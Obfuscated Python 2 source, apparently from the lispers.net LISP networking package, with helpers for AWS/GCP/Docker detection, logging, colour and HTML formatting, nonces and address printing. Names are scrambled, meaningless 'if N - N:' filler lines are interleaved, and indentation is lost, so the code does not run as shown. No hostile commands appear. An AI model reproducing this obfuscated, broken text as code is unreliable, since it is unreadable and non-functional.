if 51 - 51: IiII * O0 / II111iiii . Ii1I % OOooOOo / I1IiiI
def lisp_is_linux ( ) :
return ( platform . uname ( ) [ 0 ] == "Linux" )
if 9 - 9: I1IiiI % I1IiiI % II111iiii
if 30 - 30: IiII + I1Ii111 - IiII . IiII - II111iiii + O0
if 86 - 86: i1IIi
if 41 - 41: OoOoOO00 * I11i / OoOoOO00 % oO0o
if 18 - 18: II111iiii . OoooooooOO % OoOoOO00 % Ii1I
if 9 - 9: OoO0O00 - Oo0Ooo * OoooooooOO . Oo0Ooo
if 2 - 2: OoooooooOO % OOooOOo
def lisp_on_aws ( ) :
oOoOOo0oo0 = commands . getoutput ( "sudo dmidecode -s bios-vendor" )
if ( oOoOOo0oo0 . find ( "command not found" ) != - 1 and lisp_on_docker ( ) ) :
o0O0Oo00Oo0o = bold ( "AWS check" , False )
lprint ( "{} - dmidecode not installed in docker container" . format ( o0O0Oo00Oo0o ) )
if 74 - 74: Oo0Ooo / i11iIiiIii - II111iiii * o0oOOo0O0Ooo
return ( oOoOOo0oo0 . lower ( ) . find ( "amazon" ) != - 1 )
if 5 - 5: OOooOOo - OOooOOo . Oo0Ooo + OoOoOO00 - OOooOOo . oO0o
if 31 - 31: II111iiii - iIii1I11I1II1 - iIii1I11I1II1 % I11i
if 12 - 12: iIii1I11I1II1
if 20 - 20: o0oOOo0O0Ooo / i1IIi
if 71 - 71: OoOoOO00 . i1IIi
if 94 - 94: OOooOOo . I1Ii111
if 84 - 84: O0 . I11i - II111iiii . ooOoO0o / II111iiii
def lisp_on_gcp ( ) :
oOoOOo0oo0 = commands . getoutput ( "sudo dmidecode -s bios-version" )
return ( oOoOOo0oo0 . lower ( ) . find ( "google" ) != - 1 )
if 47 - 47: OoooooooOO
if 4 - 4: I1IiiI % I11i
if 10 - 10: IiII . OoooooooOO - OoO0O00 + IiII - O0
if 82 - 82: ooOoO0o + II111iiii
if 39 - 39: oO0o % iIii1I11I1II1 % O0 % OoooooooOO * I1ii11iIi11i + iII111i
if 68 - 68: Oo0Ooo + i11iIiiIii
if 69 - 69: iIii1I11I1II1 * iIii1I11I1II1 * i11iIiiIii + I1IiiI / OOooOOo % Ii1I
def lisp_on_docker ( ) :
return ( os . path . exists ( "/.dockerenv" ) )
if 58 - 58: OOooOOo * o0oOOo0O0Ooo + O0 % OOooOOo
if 25 - 25: Oo0Ooo % I1ii11iIi11i * ooOoO0o
if 6 - 6: iII111i . IiII * OoOoOO00 . i1IIi
if 98 - 98: i1IIi
if 65 - 65: OoOoOO00 / OoO0O00 % IiII
if 45 - 45: OoOoOO00
if 66 - 66: OoO0O00
if 56 - 56: O0
def lisp_process_logfile ( ) :
OOo00 = "./logs/lisp-{}.log" . format ( lisp_log_id )
if ( os . path . exists ( OOo00 ) ) : return
if 37 - 37: i1IIi
sys . stdout . close ( )
sys . stdout = open ( OOo00 , "a" )
if 46 - 46: OoOoOO00 - I11i - Ii1I . i1IIi
lisp_print_banner ( bold ( "logfile rotation" , False ) )
return
if 35 - 35: II111iiii * I11i - OoooooooOO . I11i . I11i
if 11 - 11: I1Ii111 / OoOoOO00 + I11i % iIii1I11I1II1
if 42 - 42: I1ii11iIi11i * OoOoOO00 % ooOoO0o - OoOoOO00 . i11iIiiIii - I1Ii111
if 84 - 84: I1Ii111 - I1ii11iIi11i / I11i
if 13 - 13: IiII - Oo0Ooo - ooOoO0o
if 92 - 92: ooOoO0o / OoOoOO00 * OoO0O00 . I11i % II111iiii
if 71 - 71: I1Ii111 % i1IIi - II111iiii - OOooOOo + OOooOOo * ooOoO0o
if 51 - 51: iIii1I11I1II1 / OoOoOO00 + OOooOOo - I11i + iII111i
def lisp_i_am ( name ) :
global lisp_log_id , lisp_i_am_itr , lisp_i_am_etr , lisp_i_am_rtr
global lisp_i_am_mr , lisp_i_am_ms , lisp_i_am_ddt , lisp_i_am_core
global lisp_hostname
if 29 - 29: o0oOOo0O0Ooo % iIii1I11I1II1 . OoooooooOO % OoooooooOO % II111iiii / iII111i
lisp_log_id = name
if ( name == "itr" ) : lisp_i_am_itr = True
if ( name == "etr" ) : lisp_i_am_etr = True
if ( name == "rtr" ) : lisp_i_am_rtr = True
if ( name == "mr" ) : lisp_i_am_mr = True
if ( name == "ms" ) : lisp_i_am_ms = True
if ( name == "ddt" ) : lisp_i_am_ddt = True
if ( name == "core" ) : lisp_i_am_core = True
if 70 - 70: i11iIiiIii % iII111i
if 11 - 11: IiII % I1ii11iIi11i % Ii1I / II111iiii % I1Ii111 - Oo0Ooo
if 96 - 96: I1ii11iIi11i / II111iiii . Ii1I - iII111i * I11i * oO0o
if 76 - 76: Ii1I - II111iiii * OOooOOo / OoooooooOO
if 18 - 18: OoO0O00 + iIii1I11I1II1 - II111iiii - I1IiiI
lisp_hostname = socket . gethostname ( )
ooo = lisp_hostname . find ( "." )
if ( ooo != - 1 ) : lisp_hostname = lisp_hostname [ 0 : ooo ]
return
if 94 - 94: OoOoOO00 - Oo0Ooo - I1IiiI % i1IIi
if 19 - 19: o0oOOo0O0Ooo
if 42 - 42: i1IIi . I1IiiI / i1IIi + Ii1I
if 54 - 54: ooOoO0o % OOooOOo . I1Ii111 + oO0o - OOooOOo * I1IiiI
if 92 - 92: o0oOOo0O0Ooo + I1Ii111 / Oo0Ooo % OoO0O00 % IiII . OoooooooOO
if 52 - 52: ooOoO0o / i11iIiiIii - OOooOOo . IiII % iIii1I11I1II1 + o0oOOo0O0Ooo
if 71 - 71: oO0o % I11i * OoOoOO00 . O0 / Ii1I . I1ii11iIi11i
if 58 - 58: Oo0Ooo / oO0o
if 44 - 44: OOooOOo
def lprint ( * args ) :
O0O0o0o0o = ( "force" in args )
if ( lisp_debug_logging == False and O0O0o0o0o == False ) : return
if 9 - 9: Oo0Ooo + OoOoOO00 - iIii1I11I1II1 - Ii1I + o0oOOo0O0Ooo
lisp_process_logfile ( )
i1 = datetime . datetime . now ( ) . strftime ( "%m/%d/%y %H:%M:%S.%f" )
i1 = i1 [ : - 3 ]
print "{}: {}:" . format ( i1 , lisp_log_id ) ,
if 97 - 97: OOooOOo
for OO0OOooOO0 in args :
if ( OO0OOooOO0 == "force" ) : continue
print OO0OOooOO0 ,
if 31 - 31: I1IiiI * oO0o + OoooooooOO - iII111i / OoooooooOO
print ""
if 19 - 19: IiII * ooOoO0o * o0oOOo0O0Ooo + O0 / O0
try : sys . stdout . flush ( )
except : pass
return
if 73 - 73: iIii1I11I1II1 / iIii1I11I1II1 - oO0o
if 91 - 91: oO0o + I1IiiI
if 59 - 59: I1IiiI + i11iIiiIii + i1IIi / I11i
if 44 - 44: I11i . OoOoOO00 * I1IiiI + OoooooooOO - iII111i - IiII
if 15 - 15: IiII / O0 . o0oOOo0O0Ooo . i11iIiiIii
if 59 - 59: I1Ii111 - o0oOOo0O0Ooo - ooOoO0o
if 48 - 48: i1IIi + I11i % OoOoOO00 / Oo0Ooo - o0oOOo0O0Ooo
if 67 - 67: oO0o % o0oOOo0O0Ooo . OoooooooOO + OOooOOo * I11i * OoOoOO00
def fprint ( * args ) :
iiIii1I = args + ( "force" , )
lprint ( * iiIii1I )
return
if 47 - 47: ooOoO0o . I11i / o0oOOo0O0Ooo
if 83 - 83: o0oOOo0O0Ooo / OOooOOo / OOooOOo + o0oOOo0O0Ooo * I1Ii111 + o0oOOo0O0Ooo
if 36 - 36: OoOoOO00 + o0oOOo0O0Ooo - OoooooooOO . oO0o . OoooooooOO / Oo0Ooo
if 72 - 72: i1IIi
if 82 - 82: OoOoOO00 + OoooooooOO / i11iIiiIii * I1ii11iIi11i . OoooooooOO
if 63 - 63: I1ii11iIi11i
if 6 - 6: ooOoO0o / I1ii11iIi11i
if 57 - 57: I11i
def dprint ( * args ) :
if ( lisp_data_plane_logging ) : lprint ( * args )
return
if 67 - 67: OoO0O00 . ooOoO0o
if 87 - 87: oO0o % Ii1I
if 83 - 83: II111iiii - I11i
if 35 - 35: i1IIi - iIii1I11I1II1 + i1IIi
if 86 - 86: iIii1I11I1II1 + OoOoOO00 . i11iIiiIii - Ii1I
if 51 - 51: OoOoOO00
if 14 - 14: IiII % oO0o % Oo0Ooo - i11iIiiIii
if 53 - 53: Ii1I % Oo0Ooo
def debug ( * args ) :
lisp_process_logfile ( )
if 59 - 59: OOooOOo % iIii1I11I1II1 . i1IIi + II111iiii * IiII
i1 = datetime . datetime . now ( ) . strftime ( "%m/%d/%y %H:%M:%S.%f" )
i1 = i1 [ : - 3 ]
if 41 - 41: Ii1I % I1ii11iIi11i
print red ( ">>>" , False ) ,
print "{}:" . format ( i1 ) ,
for OO0OOooOO0 in args : print OO0OOooOO0 ,
print red ( "<<<\n" , False )
try : sys . stdout . flush ( )
except : pass
return
if 12 - 12: OOooOOo
if 69 - 69: OoooooooOO + OOooOOo
if 26 - 26: Oo0Ooo + OOooOOo / OoO0O00 % OoOoOO00 % I1ii11iIi11i + II111iiii
if 31 - 31: I11i % OOooOOo * I11i
if 45 - 45: i1IIi . I1IiiI + OOooOOo - OoooooooOO % ooOoO0o
if 1 - 1: iIii1I11I1II1
if 93 - 93: i1IIi . i11iIiiIii . Oo0Ooo
def lisp_print_caller ( ) :
fprint ( traceback . print_last ( ) )
if 99 - 99: I11i - I1Ii111 - oO0o % OoO0O00
if 21 - 21: II111iiii % I1ii11iIi11i . i1IIi - OoooooooOO
if 4 - 4: OoooooooOO . ooOoO0o
if 78 - 78: I1ii11iIi11i + I11i - O0
if 10 - 10: I1Ii111 % I1IiiI
if 97 - 97: OoooooooOO - I1Ii111
if 58 - 58: iIii1I11I1II1 + O0
def lisp_print_banner ( string ) :
global lisp_version , lisp_hostname
if 30 - 30: ooOoO0o % iII111i * OOooOOo - I1ii11iIi11i * Ii1I % ooOoO0o
if ( lisp_version == "" ) :
lisp_version = commands . getoutput ( "cat lisp-version.txt" )
if 46 - 46: i11iIiiIii - O0 . oO0o
Oo0O = bold ( lisp_hostname , False )
lprint ( "lispers.net LISP {} {}, version {}, hostname {}" . format ( string ,
datetime . datetime . now ( ) , lisp_version , Oo0O ) )
return
if 1 - 1: O0 / iII111i % I1Ii111 . Oo0Ooo + IiII
if 27 - 27: I1Ii111 % OoooooooOO + IiII % i1IIi / oO0o / OoooooooOO
if 11 - 11: OOooOOo % Ii1I - i11iIiiIii - oO0o + ooOoO0o + IiII
if 87 - 87: I1Ii111 * i1IIi / I1ii11iIi11i
if 6 - 6: o0oOOo0O0Ooo + Oo0Ooo - OoooooooOO % OOooOOo * OoOoOO00
if 69 - 69: i1IIi
if 59 - 59: II111iiii - o0oOOo0O0Ooo
def green ( string , html ) :
if ( html ) : return ( '<font color="green"><b>{}</b></font>' . format ( string ) )
return ( bold ( "\033[92m" + string + "\033[0m" , html ) )
if 24 - 24: Oo0Ooo - i1IIi + I11i
if 38 - 38: OoooooooOO / I1ii11iIi11i . O0 / i1IIi / Oo0Ooo + iIii1I11I1II1
if 96 - 96: iII111i
if 18 - 18: iII111i * I11i - Ii1I
if 31 - 31: Oo0Ooo - O0 % OoOoOO00 % oO0o
if 45 - 45: I1ii11iIi11i + II111iiii * i11iIiiIii
if 13 - 13: OoooooooOO * oO0o - Ii1I / OOooOOo + I11i + IiII
def green_last_sec ( string ) :
return ( green ( string , True ) )
if 39 - 39: iIii1I11I1II1 - OoooooooOO
if 81 - 81: I1ii11iIi11i - O0 * OoooooooOO
if 23 - 23: II111iiii / oO0o
if 28 - 28: Oo0Ooo * ooOoO0o - OoO0O00
if 19 - 19: I11i
if 67 - 67: O0 % iIii1I11I1II1 / IiII . i11iIiiIii - Ii1I + O0
if 27 - 27: OOooOOo
def green_last_min ( string ) :
return ( '<font color="#58D68D"><b>{}</b></font>' . format ( string ) )
if 89 - 89: II111iiii / oO0o
if 14 - 14: OOooOOo . I1IiiI * ooOoO0o + II111iiii - ooOoO0o + OOooOOo
if 18 - 18: oO0o - o0oOOo0O0Ooo - I1IiiI - I1IiiI
if 54 - 54: Oo0Ooo + I1IiiI / iII111i . I1IiiI * OoOoOO00
if 1 - 1: OoOoOO00 * OoO0O00 . i1IIi / Oo0Ooo . I1ii11iIi11i + Oo0Ooo
if 17 - 17: Oo0Ooo + OoO0O00 / Ii1I / iII111i * OOooOOo
if 29 - 29: OoO0O00 % OoooooooOO * oO0o / II111iiii - oO0o
def red ( string , html ) :
if ( html ) : return ( '<font color="red"><b>{}</b></font>' . format ( string ) )
return ( bold ( "\033[91m" + string + "\033[0m" , html ) )
if 19 - 19: i11iIiiIii
if 54 - 54: II111iiii . I11i
if 73 - 73: OoOoOO00 . I1IiiI
if 32 - 32: OoOoOO00 * I1IiiI % ooOoO0o * Ii1I . O0
if 48 - 48: iII111i * iII111i
if 13 - 13: Ii1I / I11i + OoOoOO00 . o0oOOo0O0Ooo % ooOoO0o
if 48 - 48: I1IiiI / i11iIiiIii - o0oOOo0O0Ooo * oO0o / OoooooooOO
def blue ( string , html ) :
if ( html ) : return ( '<font color="blue"><b>{}</b></font>' . format ( string ) )
return ( bold ( "\033[94m" + string + "\033[0m" , html ) )
if 89 - 89: iIii1I11I1II1 / I1IiiI - II111iiii / Ii1I . i11iIiiIii . Ii1I
if 48 - 48: O0 + O0 . I1Ii111 - ooOoO0o
if 63 - 63: oO0o
if 71 - 71: i1IIi . Ii1I * iII111i % OoooooooOO + OOooOOo
if 36 - 36: IiII
if 49 - 49: OOooOOo / OoooooooOO / I1IiiI
if 74 - 74: I1Ii111 % I1ii11iIi11i
def bold ( string , html ) :
if ( html ) : return ( "<b>{}</b>" . format ( string ) )
return ( "\033[1m" + string + "\033[0m" )
if 7 - 7: II111iiii
if 27 - 27: oO0o . OoooooooOO + i11iIiiIii
if 86 - 86: I11i / o0oOOo0O0Ooo - o0oOOo0O0Ooo + I1ii11iIi11i + oO0o
if 33 - 33: o0oOOo0O0Ooo . iII111i . IiII . i1IIi
if 49 - 49: I1ii11iIi11i
if 84 - 84: I11i - Oo0Ooo / O0 - I1Ii111
if 21 - 21: O0 * O0 % I1ii11iIi11i
def convert_font ( string ) :
o00ooo = [ [ "[91m" , red ] , [ "[92m" , green ] , [ "[94m" , blue ] , [ "[1m" , bold ] ]
Ii1IiIiIi1IiI = "[0m"
if 36 - 36: IiII - OoooooooOO / OoO0O00
for iIIi1iI1I1IIi in o00ooo :
O0OO0 = iIIi1iI1I1IIi [ 0 ]
O0ooo0o0 = iIIi1iI1I1IIi [ 1 ]
oO0ooOoO = len ( O0OO0 )
ooo = string . find ( O0OO0 )
if ( ooo != - 1 ) : break
if 59 - 59: O0 % Oo0Ooo
if 92 - 92: Ii1I % iII111i / I1ii11iIi11i % I1ii11iIi11i * I1IiiI
while ( ooo != - 1 ) :
Oo = string [ ooo : : ] . find ( Ii1IiIiIi1IiI )
oO00oOOo0Oo = string [ ooo + oO0ooOoO : ooo + Oo ]
string = string [ : ooo ] + O0ooo0o0 ( oO00oOOo0Oo , True ) + string [ ooo + Oo + oO0ooOoO : : ]
if 5 - 5: o0oOOo0O0Ooo . O0 / Oo0Ooo % OoO0O00
ooo = string . find ( O0OO0 )
if 60 - 60: II111iiii / iIii1I11I1II1 + I1ii11iIi11i . i11iIiiIii
if 40 - 40: o0oOOo0O0Ooo
if 78 - 78: iIii1I11I1II1
if 56 - 56: OoooooooOO - I11i - i1IIi
if 8 - 8: I1Ii111 / OOooOOo . I1IiiI + I1ii11iIi11i / i11iIiiIii
if ( string . find ( "[1m" ) != - 1 ) : string = convert_font ( string )
return ( string )
if 31 - 31: ooOoO0o - iIii1I11I1II1 + iII111i . Oo0Ooo / IiII % iIii1I11I1II1
if 6 - 6: IiII * i11iIiiIii % iIii1I11I1II1 % i11iIiiIii + o0oOOo0O0Ooo / i1IIi
if 53 - 53: I11i + iIii1I11I1II1
if 70 - 70: I1ii11iIi11i
if 67 - 67: OoooooooOO
if 29 - 29: O0 - i11iIiiIii - II111iiii + OOooOOo * IiII
if 2 - 2: i1IIi - ooOoO0o + I1IiiI . o0oOOo0O0Ooo * o0oOOo0O0Ooo / OoOoOO00
def lisp_space ( num ) :
oOOO = ""
for iIi1I1 in range ( num ) : oOOO += " "
return ( oOOO )
if 63 - 63: iII111i * I1ii11iIi11i . OoooooooOO / OOooOOo * Oo0Ooo . ooOoO0o
if 62 - 62: i1IIi / ooOoO0o . I1IiiI * o0oOOo0O0Ooo
if 21 - 21: o0oOOo0O0Ooo
if 81 - 81: I11i / iIii1I11I1II1 - ooOoO0o * I1Ii111 . I1IiiI * I1ii11iIi11i
if 95 - 95: I1IiiI
if 88 - 88: IiII % OoO0O00 + I1Ii111 + I1Ii111 * II111iiii
if 78 - 78: OoooooooOO
def lisp_button ( string , url ) :
OOoo0 = '<button style="background-color:transparent;border-radius:10px; ' + 'type="button">'
if 36 - 36: o0oOOo0O0Ooo + I11i - IiII + iIii1I11I1II1 + OoooooooOO
if 4 - 4: II111iiii . I11i + Ii1I * I1Ii111 . ooOoO0o
if ( url == None ) :
oOoOo = OOoo0 + string + "</button>"
else :
oO0OO = '<a href="{}">' . format ( url )
OO0o0OO0 = lisp_space ( 2 )
oOoOo = OO0o0OO0 + oO0OO + OOoo0 + string + "</button></a>" + OO0o0OO0
if 56 - 56: i11iIiiIii - Oo0Ooo / iII111i / OoOoOO00
return ( oOoOo )
if 43 - 43: o0oOOo0O0Ooo . iII111i . I11i + iIii1I11I1II1
if 78 - 78: iIii1I11I1II1 % OoOoOO00 + I1ii11iIi11i / i1IIi % II111iiii + OOooOOo
if 91 - 91: iIii1I11I1II1 % OoO0O00 . o0oOOo0O0Ooo + Ii1I + o0oOOo0O0Ooo
if 95 - 95: Ii1I + I1ii11iIi11i * OOooOOo
if 16 - 16: I11i / I1IiiI + OoO0O00 % iIii1I11I1II1 - i1IIi . oO0o
if 26 - 26: o0oOOo0O0Ooo * IiII . i1IIi
if 59 - 59: O0 + i1IIi - o0oOOo0O0Ooo
def lisp_print_cour ( string ) :
oOOO = '<font face="Courier New">{}</font>' . format ( string )
return ( oOOO )
if 62 - 62: i11iIiiIii % OOooOOo . IiII . OOooOOo
if 84 - 84: i11iIiiIii * OoO0O00
if 18 - 18: OOooOOo - Ii1I - OoOoOO00 / I1Ii111 - O0
if 30 - 30: O0 + I1ii11iIi11i + II111iiii
if 14 - 14: o0oOOo0O0Ooo / OOooOOo - iIii1I11I1II1 - oO0o % ooOoO0o
if 49 - 49: ooOoO0o * oO0o / o0oOOo0O0Ooo / Oo0Ooo * iIii1I11I1II1
if 57 - 57: OoOoOO00 - oO0o / ooOoO0o % i11iIiiIii
def lisp_print_sans ( string ) :
oOOO = '<font face="Sans-Serif">{}</font>' . format ( string )
return ( oOOO )
if 3 - 3: iII111i . ooOoO0o % I1IiiI + I1ii11iIi11i
if 64 - 64: i1IIi
if 29 - 29: o0oOOo0O0Ooo / i11iIiiIii / I1IiiI % oO0o % i11iIiiIii
if 18 - 18: OOooOOo + I1Ii111
if 80 - 80: oO0o + o0oOOo0O0Ooo * Ii1I + OoO0O00
if 75 - 75: I11i / o0oOOo0O0Ooo / OOooOOo / IiII % ooOoO0o + II111iiii
if 4 - 4: iII111i - Oo0Ooo - IiII - I11i % i11iIiiIii / OoO0O00
def lisp_span ( string , hover_string ) :
oOOO = '<span title="{}">{}</span>' . format ( hover_string , string )
return ( oOOO )
if 50 - 50: ooOoO0o + i1IIi
if 31 - 31: Ii1I
if 78 - 78: i11iIiiIii + o0oOOo0O0Ooo + I1Ii111 / o0oOOo0O0Ooo % iIii1I11I1II1 % IiII
if 83 - 83: iIii1I11I1II1 % OoOoOO00 % o0oOOo0O0Ooo % I1Ii111 . I1ii11iIi11i % O0
if 47 - 47: o0oOOo0O0Ooo
if 66 - 66: I1IiiI - IiII
if 33 - 33: I1IiiI / OoO0O00
def lisp_eid_help_hover ( output ) :
iiIIi = '''Unicast EID format:
For longest match lookups:
<address> or [<iid>]<address>
For exact match lookups:
<prefix> or [<iid>]<prefix>
Multicast EID format:
For longest match lookups:
<address>-><group> or
[<iid>]<address>->[<iid>]<group>'''
if 36 - 36: I11i . II111iiii
if 25 - 25: oO0o
iI1 = lisp_span ( output , iiIIi )
return ( iI1 )
if 11 - 11: OoO0O00
if 18 - 18: iII111i - oO0o % iII111i / I11i
if 68 - 68: Ii1I * iIii1I11I1II1 + I1Ii111 % OoOoOO00
if 46 - 46: OoOoOO00 % i1IIi / oO0o * Oo0Ooo * OOooOOo
if 67 - 67: OoOoOO00 * OoOoOO00 . OoOoOO00 + Ii1I / oO0o
if 13 - 13: iII111i
if 80 - 80: Ii1I - o0oOOo0O0Ooo
def lisp_geo_help_hover ( output ) :
iiIIi = '''EID format:
<address> or [<iid>]<address>
'<name>' or [<iid>]'<name>'
Geo-Point format:
d-m-s-<N|S>-d-m-s-<W|E> or
[<iid>]d-m-s-<N|S>-d-m-s-<W|E>
Geo-Prefix format:
d-m-s-<N|S>-d-m-s-<W|E>/<km> or
[<iid>]d-m-s-<N|S>-d-m-s-<W|E>/<km>'''
if 41 - 41: o0oOOo0O0Ooo - Oo0Ooo * I1IiiI
if 82 - 82: OoO0O00 % o0oOOo0O0Ooo % OOooOOo / O0
iI1 = lisp_span ( output , iiIIi )
return ( iI1 )
if 94 - 94: I1ii11iIi11i + I1ii11iIi11i + OoooooooOO % ooOoO0o
if 7 - 7: iII111i
if 78 - 78: OOooOOo + iII111i . IiII
if 91 - 91: iIii1I11I1II1 . o0oOOo0O0Ooo . I1ii11iIi11i + OoooooooOO
if 69 - 69: I1Ii111 - I1IiiI
if 95 - 95: I1IiiI * i11iIiiIii . ooOoO0o
if 41 - 41: II111iiii
def space ( num ) :
oOOO = ""
for iIi1I1 in range ( num ) : oOOO += " "
return ( oOOO )
if 37 - 37: I11i . Oo0Ooo % IiII * i1IIi
if 71 - 71: Oo0Ooo / o0oOOo0O0Ooo + OOooOOo
if 48 - 48: I1Ii111 + iII111i
if 16 - 16: iIii1I11I1II1 % i11iIiiIii . OoOoOO00 % ooOoO0o + oO0o . OoO0O00
if 46 - 46: OoO0O00 - o0oOOo0O0Ooo / OoOoOO00 - OoooooooOO + oO0o
if 58 - 58: o0oOOo0O0Ooo / o0oOOo0O0Ooo + ooOoO0o + I11i - OoOoOO00 . OOooOOo
if 15 - 15: ooOoO0o * OoOoOO00 % IiII . OoOoOO00 . I11i
if 97 - 97: oO0o
def lisp_get_ephemeral_port ( ) :
return ( random . randrange ( 32768 , 65535 ) )
if 80 - 80: I1IiiI . Ii1I
if 47 - 47: I11i + ooOoO0o + II111iiii % i11iIiiIii
if 93 - 93: I1ii11iIi11i % OoOoOO00 . O0 / iII111i * oO0o
if 29 - 29: o0oOOo0O0Ooo
if 86 - 86: II111iiii . IiII
if 2 - 2: OoooooooOO
if 60 - 60: OoO0O00
def lisp_get_data_nonce ( ) :
return ( random . randint ( 0 , 0xffffff ) )
if 81 - 81: OoOoOO00 % Ii1I
if 87 - 87: iIii1I11I1II1 . OoooooooOO * OoOoOO00
if 100 - 100: OoO0O00 / i1IIi - I1IiiI % Ii1I - iIii1I11I1II1
if 17 - 17: I11i / o0oOOo0O0Ooo % Oo0Ooo
if 71 - 71: IiII . I1Ii111 . OoO0O00
if 68 - 68: i11iIiiIii % oO0o * OoO0O00 * IiII * II111iiii + O0
if 66 - 66: I11i % I1ii11iIi11i % OoooooooOO
def lisp_get_control_nonce ( ) :
return ( random . randint ( 0 , ( 2 ** 64 ) - 1 ) )
if 34 - 34: o0oOOo0O0Ooo / iII111i % O0 . OoO0O00 . i1IIi
if 29 - 29: O0 . I1Ii111
if 66 - 66: oO0o * iIii1I11I1II1 % iIii1I11I1II1 * IiII - ooOoO0o - IiII
if 70 - 70: I1Ii111 + oO0o
if 93 - 93: I1Ii111 + Ii1I
if 33 - 33: O0
if 78 - 78: O0 / II111iiii * OoO0O00
if 50 - 50: OoooooooOO - iIii1I11I1II1 + i1IIi % I1Ii111 - iIii1I11I1II1 % O0
if 58 - 58: IiII + iIii1I11I1II1
def lisp_hex_string ( integer_value ) :
Oo00OO0OO = hex ( integer_value ) [ 2 : : ]
if ( Oo00OO0OO [ - 1 ] == "L" ) : Oo00OO0OO = Oo00OO0OO [ 0 : - 1 ]
return ( Oo00OO0OO )
if 85 - 85: o0oOOo0O0Ooo % ooOoO0o . OoOoOO00 % I1Ii111 - Oo0Ooo
if 69 - 69: ooOoO0o - o0oOOo0O0Ooo . ooOoO0o
if 9 - 9: oO0o % i11iIiiIii / Oo0Ooo
if 20 - 20: oO0o * O0 + I11i - OoooooooOO . I11i
if 60 - 60: o0oOOo0O0Ooo . o0oOOo0O0Ooo / iII111i
if 45 - 45: O0 . i11iIiiIii % iII111i . OoOoOO00 % IiII % iIii1I11I1II1
if 58 - 58: iIii1I11I1II1 . OoOoOO00 - i11iIiiIii * iIii1I11I1II1 % i11iIiiIii / I1IiiI
def lisp_get_timestamp ( ) :
return ( time . time ( ) )
if 80 - 80: I1ii11iIi11i / iIii1I11I1II1 % OoOoOO00
if 80 - 80: OoO0O00 % iII111i
if 99 - 99: ooOoO0o / iIii1I11I1II1 - Ii1I * I1ii11iIi11i % I1IiiI
if 13 - 13: OoO0O00
if 70 - 70: I1Ii111 + O0 . oO0o * Ii1I
if 2 - 2: OoooooooOO . OOooOOo . IiII
if 42 - 42: OOooOOo % oO0o / OoO0O00 - oO0o * i11iIiiIii
def lisp_set_timestamp ( seconds ) :
return ( time . time ( ) + seconds )
if 19 - 19: oO0o * I1IiiI % i11iIiiIii
if 24 - 24: o0oOOo0O0Ooo
if 10 - 10: o0oOOo0O0Ooo % Ii1I / OOooOOo
if 28 - 28: OOooOOo % ooOoO0o
if 48 - 48: i11iIiiIii % oO0o
if 29 - 29: iII111i + i11iIiiIii % I11i
if 93 - 93: OoOoOO00 % iIii1I11I1II1
def lisp_print_elapsed ( ts ) :
if ( ts == 0 or ts == None ) : return ( "never" )
Ooo0o0oo0 = time . time ( ) - ts
Ooo0o0oo0 = round ( Ooo0o0oo0 , 0 )
return ( str ( datetime . timedelta ( seconds = Ooo0o0oo0 ) ) )
if 87 - 87: OoOoOO00 / IiII + iIii1I11I1II1
if 93 - 93: iIii1I11I1II1 + oO0o % ooOoO0o
if 21 - 21: OOooOOo
if 6 - 6: IiII
if 46 - 46: IiII + oO0o
if 79 - 79: OoooooooOO - IiII * IiII . OoOoOO00
if 100 - 100: II111iiii * I11i % I1IiiI / I1ii11iIi11i
def lisp_print_future ( ts ) :
if ( ts == 0 ) : return ( "never" )
OOo = ts - time . time ( )
if ( OOo < 0 ) : return ( "expired" )
OOo = round ( OOo , 0 )
return ( str ( datetime . timedelta ( seconds = OOo ) ) )
if 99 - 99: OoOoOO00
if 77 - 77: o0oOOo0O0Ooo
if 48 - 48: OoOoOO00 % I1ii11iIi11i / I11i . iIii1I11I1II1 * II111iiii
if 65 - 65: OoOoOO00
if 31 - 31: I11i * OoOoOO00 . IiII % Ii1I + Oo0Ooo
if 47 - 47: O0 * I1IiiI * OoO0O00 . II111iiii
if 95 - 95: Ii1I % IiII . O0 % I1Ii111
if 68 - 68: Oo0Ooo . Oo0Ooo - I1ii11iIi11i / I11i . ooOoO0o / i1IIi
if 12 - 12: I1ii11iIi11i * i1IIi * I11i
if 23 - 23: OOooOOo / O0 / I1IiiI
if 49 - 49: I11i . o0oOOo0O0Ooo % oO0o / Ii1I
if 95 - 95: O0 * OoOoOO00 * IiII . ooOoO0o / iIii1I11I1II1
if 28 - 28: IiII + oO0o - ooOoO0o / iIii1I11I1II1 - I1IiiI
def lisp_print_eid_tuple ( eid , group ) :
Ii1i1 = eid . print_prefix ( )
if ( group . is_null ( ) ) : return ( Ii1i1 )
if 65 - 65: oO0o + I1ii11iIi11i / OOooOOo
oo0oo = group . print_prefix ( )
IiIIi11i111 = group . instance_id
if 67 - 67: i1IIi
if ( eid . is_null ( ) or eid . is_exact_match ( group ) ) :
ooo = oo0oo . find ( "]" ) + 1
return ( "[{}](*, {})" . format ( IiIIi11i111 , oo0oo [ ooo : : ] ) )
if 5 - 5: II111iiii . OoooooooOO
if 57 - 57: I1IiiI
iii1IIiI = eid . print_sg ( group )
return ( iii1IIiI )
if 33 - 33: I11i
if 98 - 98: OoOoOO00 % II111iiii
if 95 - 95: iIii1I11I1II1 - I1Ii111 - OOooOOo + I1Ii111 % I1ii11iIi11i . I1IiiI
if 41 - 41: O0 + oO0o . i1IIi - II111iiii * o0oOOo0O0Ooo . OoO0O00
if 68 - 68: o0oOOo0O0Ooo
if 20 - 20: I1Ii111 - I1Ii111
if 37 - 37: IiII
if 37 - 37: Oo0Ooo / IiII * O0
def lisp_convert_6to4 ( addr_str ) :
if ( addr_str . find ( "::ffff:" ) == - 1 ) : return ( addr_str )
o0o00O0oOooO0 = addr_str . split ( ":" )
return ( o0o00O0oOooO0 [ - 1 ] )
if 99 - 99: ooOoO0o
if 76 - 76: OoO0O00
if 92 - 92: I11i - iIii1I11I1II1 % OoooooooOO
if 39 - 39: iII111i . I1IiiI * OoOoOO00 - i11iIiiIii
if 1 - 1: iII111i * OoOoOO00
if 66 - 66: OoOoOO00 + i1IIi % II111iiii . O0 * I1ii11iIi11i % I1ii11iIi11i
if 87 - 87: OOooOOo + o0oOOo0O0Ooo . iII111i - OoooooooOO
if 6 - 6: iIii1I11I1II1 * OoooooooOO
if 28 - 28: Oo0Ooo * o0oOOo0O0Ooo / I1Ii111
if 52 - 52: O0 / o0oOOo0O0Ooo % iII111i * I1IiiI % OOooOOo
if 69 - 69: I1ii11iIi11i
def lisp_convert_4to6 ( addr_str ) :
o0o00O0oOooO0 = lisp_address ( LISP_AFI_IPV6 , "" , 128 , 0 )
if ( o0o00O0oOooO0 . is_ipv4_string ( addr_str ) ) : addr_str = "::ffff:" + addr_str
